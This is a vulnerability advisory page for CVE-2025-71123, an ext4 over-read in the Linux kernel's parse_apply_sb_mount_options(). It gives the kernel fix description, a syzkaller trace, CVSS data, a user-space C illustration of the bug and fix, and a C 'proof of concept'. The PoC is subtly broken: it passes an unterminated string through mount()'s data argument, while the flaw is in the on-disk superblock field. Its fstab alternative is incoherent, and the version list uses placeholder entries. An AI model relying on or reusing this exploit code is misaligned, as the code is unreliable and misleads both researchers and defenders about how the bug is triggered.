Security Vulnerability Report
CVE-2025-71123 CVSS 7.8 HIGH

CVE-2025-71123

Published: 2026-01-14 15:16:02
Last Modified: 2026-03-25 18:28:39
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ext4: fix string copying in parse_apply_sb_mount_options()

strscpy_pad() can't be used to copy a non-NUL-term string into a NUL-term string of possibly bigger size. Commit 0efc5990bca5 ("string.h: Introduce memtostr() and memtostr_pad()") provides additional information in that regard. So if this happens, the following warning is observed:

strnlen: detected buffer overflow: 65 byte read of buffer size 64
WARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032
Modules linked in:
CPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
RIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032
Call Trace:
 <TASK>
 __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039
 strnlen include/linux/fortify-string.h:235 [inline]
 sized_strscpy include/linux/fortify-string.h:309 [inline]
 parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]
 __ext4_fill_super fs/ext4/super.c:5261 [inline]
 ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706
 get_tree_bdev_flags+0x387/0x620 fs/super.c:1636
 vfs_get_tree+0x93/0x380 fs/super.c:1814
 do_new_mount fs/namespace.c:3553 [inline]
 path_mount+0x6ae/0x1f70 fs/namespace.c:3880
 do_mount fs/namespace.c:3893 [inline]
 __do_sys_mount fs/namespace.c:4103 [inline]
 __se_sys_mount fs/namespace.c:4080 [inline]
 __x64_sys_mount+0x280/0x300 fs/namespace.c:4080
 do_syscall_x64 arch/x86/entry/common.c:52 [inline]
 do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83
 entry_SYSCALL_64_after_hwframe+0x76/0x7e

Since userspace is expected to provide s_mount_opts field to be at most 63 characters long with the ending byte being NUL-term, use a 64-byte buffer which matches the size of s_mount_opts, so that strscpy_pad() does its job properly. Return with error if the user still managed to provide a non-NUL-term string here.

Found by Linux Verification Center (linuxtesting.org) with Syzkaller.
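As an added illustration (not the kernel's code and not part of this advisory), the following user-space C models the two patterns the description contrasts: a copy whose NUL scan is bounded by a larger destination, which would read past a 64-byte s_mount_opts field that carries no terminator, and the fixed copy that sizes its buffer to the field and rejects an unterminated value. The names dst_bounded_scan_bytes, copy_sb_mount_opts and demo_unterminated_field are my own, and the sample field contents are constructed.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

/* Size of the on-disk ext4 superblock field s_mount_opts, per the advisory. */
#define SB_MOUNT_OPTS_LEN 64

/*
 * Pre-fix pattern, modelled: a strscpy_pad()-style copy scans the source for a
 * NUL with the *destination* size as its bound. This only reports how many
 * source bytes such a scan would touch; it never reads past the field itself.
 * Added user-space illustration, not the kernel's code.
 */
size_t dst_bounded_scan_bytes(const char *src, size_t src_field, size_t dst_len)
{
    for (size_t i = 0; i < src_field && i < dst_len; i++)
        if (src[i] == '\0')
            return i + 1;   /* terminator found inside the field */
    /* No NUL inside the field: the scan keeps going up to dst_len bytes,
     * overrunning the field whenever dst_len > src_field. */
    return dst_len;
}

/*
 * Fixed pattern, modelled: destination and scan bound both equal the 64-byte
 * field, and a field without a terminator is rejected rather than over-read.
 * Returns 0 with a zero-padded copy in dst, or -EINVAL.
 */
int copy_sb_mount_opts(const char src[SB_MOUNT_OPTS_LEN], char dst[SB_MOUNT_OPTS_LEN])
{
    const char *nul = memchr(src, '\0', SB_MOUNT_OPTS_LEN); /* never looks past byte 63 */
    if (nul == NULL)
        return -EINVAL;                                     /* not NUL-terminated: refuse */
    size_t len = (size_t)(nul - src);
    memcpy(dst, src, len);
    memset(dst + len, 0, SB_MOUNT_OPTS_LEN - len);          /* strscpy_pad-style padding */
    return 0;
}

/* Constructed sample: 64 'A' bytes with no terminator (the syzkaller case). Returns
 * the byte count a 65-byte-bounded scan would read, or -1 if the fixed copy failed to reject. */
int demo_unterminated_field(void)
{
    char field[SB_MOUNT_OPTS_LEN], out[SB_MOUNT_OPTS_LEN];
    memset(field, 'A', sizeof field);
    if (copy_sb_mount_opts(field, out) != -EINVAL)
        return -1;
    return (int)dst_bounded_scan_bytes(field, sizeof field, SB_MOUNT_OPTS_LEN + 1);
}
```

The 65 returned for the unterminated field is the same "65 byte read of buffer size 64" the fortified strnlen reports in the trace above, while the fixed path returns an error without touching byte 64.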

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel 6.12.x < 6.12.54
Linux Kernel 6.6.x < 6.6.y stable patches
Linux Kernel 5.15.x < 5.15.y stable patches
Linux Kernel 5.10.x < 5.10.y stable patches
Linux Kernel 5.4.x < 5.4.y stable patches
Linux Kernel 4.19.x < 4.19.y stable patches

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * PoC for CVE-2025-71123: ext4 strscpy_pad buffer overflow in parse_apply_sb_mount_options()
 *
 * This PoC demonstrates how to trigger the buffer overflow detection by providing
 * a mount option string that is longer than expected (63 chars) without proper NUL termination.
 *
 * Note: This requires root privileges and a loop device setup.
 */

#define EXT4_MOUNT_OPTIONS_MAX 65

int trigger_vulnerability(const char *device, const char *mount_point)
{
    /*
     * Create a mount option string that exceeds the expected 63 characters
     * and is not properly NUL-terminated.
     * The kernel expects s_mount_opts to be at most 63 chars + NUL (64 bytes total).
     */
    char malicious_opts[EXT4_MOUNT_OPTIONS_MAX + 1];

    /* Fill with repeated pattern to exceed 63 characters */
    memset(malicious_opts, 'A', EXT4_MOUNT_OPTIONS_MAX);
    /* Do NOT NUL-terminate - this triggers the vulnerability */

    /* Attempt to mount ext4 with malicious options */
    int ret = mount(device, mount_point, "ext4", 0, malicious_opts);
    if (ret == -1) {
        perror("mount failed (expected - may trigger kernel warning)");
    }
    return ret;
}

/* Alternative: Trigger via /etc/fstab with long mount options */
void create_malicious_fstab_entry(void)
{
    /*
     * Add entry to /etc/fstab with mount options exceeding 63 characters:
     * /dev/loop0 /mnt/test ext4 defaults,<64_CHAR_OPTIONS_NO_NULL> 0 0
     *
     * Then run: mount /mnt/test
     */
    printf("Create fstab entry with mount options > 63 chars without NUL termination\n");
}

int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <device> <mount_point>\n", argv[0]);
        return 1;
    }
    printf("CVE-2025-71123 PoC - ext4 strscpy_pad buffer overflow\n");
    printf("Attempting to trigger vulnerability with malformed mount options...\n");
    return trigger_vulnerability(argv[1], argv[2]);
}
